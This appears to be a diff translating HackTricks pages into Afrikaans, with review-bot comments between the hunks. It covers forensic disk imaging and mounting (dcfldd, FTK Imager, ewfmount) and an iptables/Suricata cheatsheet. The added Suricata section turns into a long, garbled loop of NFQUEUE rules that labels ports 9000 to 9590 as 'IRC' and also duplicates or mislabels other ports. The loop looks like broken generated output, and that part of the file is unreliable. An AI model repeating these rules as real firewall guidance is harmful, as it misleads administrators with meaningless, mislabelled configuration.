dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
|
||||
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
|
||||
```
|
||||
|
||||
### FTK Imager
|
||||
|
||||
You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
|
||||
|
||||
Jy kan die FTK imager [**hier aflaai**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1).
|
||||
```bash
|
||||
ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name'
|
||||
```
|
||||
|
||||
### EWF
|
||||
|
||||
You can generate a disk image using the[ **ewf tools**](https://github.com/libyal/libewf).
|
||||
|
||||
Jy kan 'n skyfbeeld genereer deur die [**ewf tools**](https://github.com/libyal/libewf) te gebruik.
|
||||
```bash
|
||||
ewfacquire /dev/sdb
|
||||
#Name: evidence
|
||||
|
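Review bot: the comment in the dcfldd block, `#Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data)`, has a typo ("more secure") that is being carried into the new file unchanged; fix it here or upstream. The English paragraphs between "### dcfldd" and that block ("dcfldd is a command-line tool ..." through "... preserving and analyzing evidence.") appear in this hunk with no Afrikaans counterpart, unlike the FTK Imager and EWF sentences below them, which do get a translated line each; if they stay in the new file they need translating, and if they are being dropped the code comment already conveys the point. Note also that the second line of that block is a template with `<subject device>`, `<image file>`, `<algorithm>` and `<hash file>` placeholders followed by a concrete example on the next line; a short comment marking the first as the template would make the two lines easier to read.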
@ -57,52 +64,56 @@ ewfacquire /dev/sdb
|
|||
#Then use default values
|
||||
#It will generate the disk image in the current directory
|
||||
```
|
||||
## Monteer
|
||||
|
||||
## Mount
|
||||
### Verskeie tipes
|
||||
|
||||
### Several types
|
||||
|
||||
In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**.
|
||||
|
||||
### Raw
|
||||
In **Windows** kan jy probeer om die gratis weergawe van Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) te gebruik om **die forensiese beeld te monteer**.
|
||||
|
||||
### Rou
|
||||
```bash
|
||||
#Get file type
|
||||
file evidence.img
|
||||
file evidence.img
|
||||
evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b82b280cf299 (extents) (64bit) (large files) (huge files)
|
||||
|
||||
#Mount it
|
||||
mount evidence.img /mnt
|
||||
```
|
||||
|
||||
### EWF
|
||||
|
||||
EWF (EnCase Evidence File) is a file format used for forensic disk imaging. It is commonly used in digital forensics to create a forensic image of a disk or a partition. The EWF format ensures the integrity and authenticity of the acquired image by storing a cryptographic hash of the data.
|
||||
|
||||
To acquire an image using EWF, you can use tools like EnCase, FTK Imager, or ewfacquire. These tools allow you to create a bit-by-bit copy of the disk or partition, including both allocated and unallocated space.
|
||||
|
||||
The EWF format has several advantages over other imaging formats. It supports compression, which can reduce the size of the acquired image. It also supports encryption, which can protect the image from unauthorized access. Additionally, EWF files can be easily mounted and accessed using tools like ewfmount.
|
||||
|
||||
To mount an EWF file, you can use the ewfmount command followed by the path to the EWF file and the mount point. This will create a virtual disk that contains the contents of the EWF file, allowing you to access and analyze the data within.
|
||||
|
||||
Overall, EWF is a reliable and widely used format for acquiring and analyzing disk images in digital forensics. Its support for compression, encryption, and easy mounting makes it a valuable tool for forensic investigators.
|
||||
```bash
|
||||
#Get file type
|
||||
file evidence.E01
|
||||
file evidence.E01
|
||||
evidence.E01: EWF/Expert Witness/EnCase image file format
|
||||
|
||||
#Transform to raw
|
||||
mkdir output
|
||||
ewfmount evidence.E01 output/
|
||||
file output/ewf1
|
||||
file output/ewf1
|
||||
output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be813be09b24 (needs journal recovery) (extents) (64bit) (large files) (huge files)
|
||||
|
||||
#Mount
|
||||
mount output/ewf1 -o ro,norecovery /mnt
|
||||
```
|
||||
|
||||
### ArsenalImageMounter
|
||||
|
||||
It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
|
||||
Dit is 'n Windows-toepassing om volumes te monteer. Jy kan dit hier aflaai [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)
|
||||
|
||||
### Errors
|
||||
|
||||
* **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`**
|
||||
* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector:
|
||||
### Foute
|
||||
|
||||
* **`kan nie /dev/loop0 as slegs-lees monteer nie`** in hierdie geval moet jy die vlae **`-o ro,norecovery`** gebruik
|
||||
* **`verkeerde fs-tipe, slegte opsie, slegte superblock op /dev/loop0, ontbrekende kodebladsy of hulpprogram, of ander fout.`** in hierdie geval het die monteer misluk as gevolg van die verskil in die verskuiwing van die lêersisteem en die skyfbeeld. Jy moet die Sektor-grootte en die Beginsektor vind:
|
||||
```bash
|
||||
fdisk -l disk.img
|
||||
fdisk -l disk.img
|
||||
Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors
|
||||
Units: sectors of 1 * 512 = 512 bytes
|
||||
Sector size (logical/physical): 512 bytes / 512 bytes
|
||||
|
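Review bot: The two `mount` error strings in the Errors list were translated: `cannot mount /dev/loop0 read-only` became `kan nie /dev/loop0 as slegs-lees monteer nie`, and `wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.` was translated the same way. Both are literal messages printed by `mount`, and readers will search the page for the English text they see in their terminal; keep quoted program output in English and translate only the explanation that follows it. The heading `### Foute` and the flag text `-o ro,norecovery` are fine as they are.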
@ -113,21 +124,18 @@ Disk identifier: 0x00495395
|
|||
Device Boot Start End Sectors Size Id Type
|
||||
disk.img1 2048 208895 206848 101M 1 FAT12
|
||||
```
|
||||
|
||||
Note that sector size is **512** and start is **2048**. Then mount the image like this:
|
||||
|
||||
Let daarop dat die sektor grootte **512** is en die beginpunt is **2048**. Monteer dan die prent soos volg:
|
||||
```bash
|
||||
mount disk.img /mnt -o ro,offset=$((2048*512))
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
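Review bot: Terminology is inconsistent in the mount paragraph: `Monteer dan die prent soos volg` renders the disk image as `prent` (a picture), while the Errors list above already uses `skyfbeeld` for the same thing; use `skyfbeeld` consistently, and write `sektorgrootte` as one word to match `Beginsektor`. The command itself, `mount disk.img /mnt -o ro,offset=$((2048*512))`, is unchanged and still agrees with the `2048` start sector and `512` byte sector size shown in the `fdisk -l` output.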
File diff suppressed because it is too large
|
@ -1,29 +1,28 @@
|
|||
# Suricata & Iptables cheatsheet
|
||||
# Suricata & Iptables spiekbrief
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
## Iptables
|
||||
|
||||
### Chains
|
||||
### Kettings
|
||||
|
||||
In iptables, lists of rules known as chains are processed sequentially. Among these, three primary chains are universally present, with additional ones like NAT being potentially supported depending on the system's capabilities.
|
||||
In iptables word lys van reëls wat kettings genoem word, sekwensieel verwerk. Daar is drie primêre kettings wat universeel teenwoordig is, met addisionele kettings soos NAT wat moontlik ondersteun word, afhangende van die vermoëns van die stelsel.
|
||||
|
||||
- **Input Chain**: Utilized for managing the behavior of incoming connections.
|
||||
- **Forward Chain**: Employed for handling incoming connections that are not destined for the local system. This is typical for devices acting as routers, where the data received is meant to be forwarded to another destination. This chain is relevant primarily when the system is involved in routing, NATing, or similar activities.
|
||||
- **Output Chain**: Dedicated to the regulation of outgoing connections.
|
||||
|
||||
These chains ensure the orderly processing of network traffic, allowing for the specification of detailed rules governing the flow of data into, through, and out of a system.
|
||||
- **Input-ketting**: Word gebruik om die gedrag van inkomende verbindinge te bestuur.
|
||||
- **Forward-ketting**: Word gebruik om inkomende verbindinge te hanteer wat nie bedoel is vir die plaaslike stelsel nie. Dit is tipies vir toestelle wat as roetingswerk optree, waar die ontvangste data bedoel is om na 'n ander bestemming gestuur te word. Hierdie ketting is hoofsaaklik relevant wanneer die stelsel betrokke is by roetering, NATing of soortgelyke aktiwiteite.
|
||||
- **Output-ketting**: Word toegewy aan die regulering van uitgaande verbindinge.
|
||||
|
||||
Hierdie kettings verseker die ordelike verwerking van netwerkverkeer, wat die spesifikasie van gedetailleerde reëls moontlik maak wat die vloei van data in, deur en uit 'n stelsel beheer.
|
||||
```bash
|
||||
# Delete all rules
|
||||
iptables -F
|
||||
|
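Review bot: In the Chains paragraph, `In iptables word lys van reëls wat kettings genoem word` drops the plural of `lists of rules`; it should read `lyste van reëls`. In the Forward-ketting bullet, `roetingswerk` is not the word for routers (`roeteerders`, or simply keeping `routers`, would be clear), and `ontvangste data` should be `ontvangde data`. The chain names `Input`, `Forward` and `Output` and the term `NAT` are correctly left in English, since they match the iptables chain identifiers a user types.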
@ -60,11 +59,324 @@ iptables-save > /etc/sysconfig/iptables
|
|||
ip6tables-save > /etc/sysconfig/ip6tables
|
||||
iptables-restore < /etc/sysconfig/iptables
|
||||
```
|
||||
|
||||
## Suricata
|
||||
|
||||
### Install & Config
|
||||
### Installeer & Konfigurasie
|
||||
|
||||
```bash
|
||||
# Installeer Suricata
|
||||
sudo apt-get install suricata
|
||||
|
||||
# Skep 'n nuwe konfigurasie lêer
|
||||
sudo cp /etc/suricata/suricata.yaml /etc/suricata/suricata.yaml.bak
|
||||
|
||||
# Pas die konfigurasie lêer aan
|
||||
sudo nano /etc/suricata/suricata.yaml
|
||||
|
||||
# Stel die volgende waardes in:
|
||||
- HOME_NET: jou_netwerk
|
||||
- EXTERNAL_NET: enige
|
||||
- RULES_DIR: /etc/suricata/rules
|
||||
- LOG_DIR: /var/log/suricata/
|
||||
|
||||
# Stoor die veranderinge en sluit die lêer
|
||||
|
||||
# Skep 'n nuwe reëls gids
|
||||
sudo mkdir /etc/suricata/rules
|
||||
|
||||
# Skep 'n nuwe reëls lêer
|
||||
sudo touch /etc/suricata/rules/local.rules
|
||||
|
||||
# Herlaai Suricata se konfigurasie
|
||||
sudo suricata-update enable-source oisf/trafficid
|
||||
sudo suricata-update update-sources
|
||||
sudo suricata-update
|
||||
|
||||
# Begin Suricata
|
||||
sudo suricata -c /etc/suricata/suricata.yaml -i jou_interface
|
||||
```
|
||||
|
||||
### Iptables
|
||||
|
||||
```bash
|
||||
# Skep 'n nuwe iptables reël
|
||||
sudo iptables -A OUTPUT -p tcp --dport 80 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir HTTPS
|
||||
sudo iptables -A OUTPUT -p tcp --dport 443 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir DNS
|
||||
sudo iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir ICMP
|
||||
sudo iptables -A OUTPUT -p icmp -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir SSH
|
||||
sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir RDP
|
||||
sudo iptables -A OUTPUT -p tcp --dport 3389 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir FTP
|
||||
sudo iptables -A OUTPUT -p tcp --dport 21 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir Telnet
|
||||
sudo iptables -A OUTPUT -p tcp --dport 23 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir SMTP
|
||||
sudo iptables -A OUTPUT -p tcp --dport 25 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir POP3
|
||||
sudo iptables -A OUTPUT -p tcp --dport 110 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IMAP
|
||||
sudo iptables -A OUTPUT -p tcp --dport 143 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir SNMP
|
||||
sudo iptables -A OUTPUT -p udp --dport 161 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir NTP
|
||||
sudo iptables -A OUTPUT -p udp --dport 123 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir MySQL
|
||||
sudo iptables -A OUTPUT -p tcp --dport 3306 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir PostgreSQL
|
||||
sudo iptables -A OUTPUT -p tcp --dport 5432 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir MSSQL
|
||||
sudo iptables -A OUTPUT -p tcp --dport 1433 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir Oracle
|
||||
sudo iptables -A OUTPUT -p tcp --dport 1521 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir VNC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 5900 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir SMB
|
||||
sudo iptables -A OUTPUT -p tcp --dport 445 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir LDAP
|
||||
sudo iptables -A OUTPUT -p tcp --dport 389 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir FTPS
|
||||
sudo iptables -A OUTPUT -p tcp --dport 990 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir SFTP
|
||||
sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 6667 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir Rsync
|
||||
sudo iptables -A OUTPUT -p tcp --dport 873 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir DNSSEC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 853 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir DHCP
|
||||
sudo iptables -A OUTPUT -p udp --dport 67:68 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 194 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 6660:6669 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 7000 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 8000 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9000 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9001 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9009 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9010 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9020 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9030 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9040 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9050 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9060 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9070 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9080 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9090 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9100 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9110 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9120 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9130 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9140 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9150 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9160 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9170 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9180 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9190 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9200 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9210 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9220 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9230 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9240 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9250 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9260 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9270 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9280 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9290 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9300 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9310 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9320 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9330 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9340 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9350 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9360 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9370 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9380 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9390 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9400 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9410 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9420 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9430 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9440 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9450 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9460 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9470 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9480 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9490 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9500 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9510 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9520 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9530 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9540 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9550 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9560 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9570 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9580 -j NFQUEUE --queue-num 1
|
||||
|
||||
# Skep 'n nuwe iptables reël vir IRC
|
||||
sudo iptables -A OUTPUT -p tcp --dport 9590 -j NFQUEUE --queue-num 1
|
||||
|
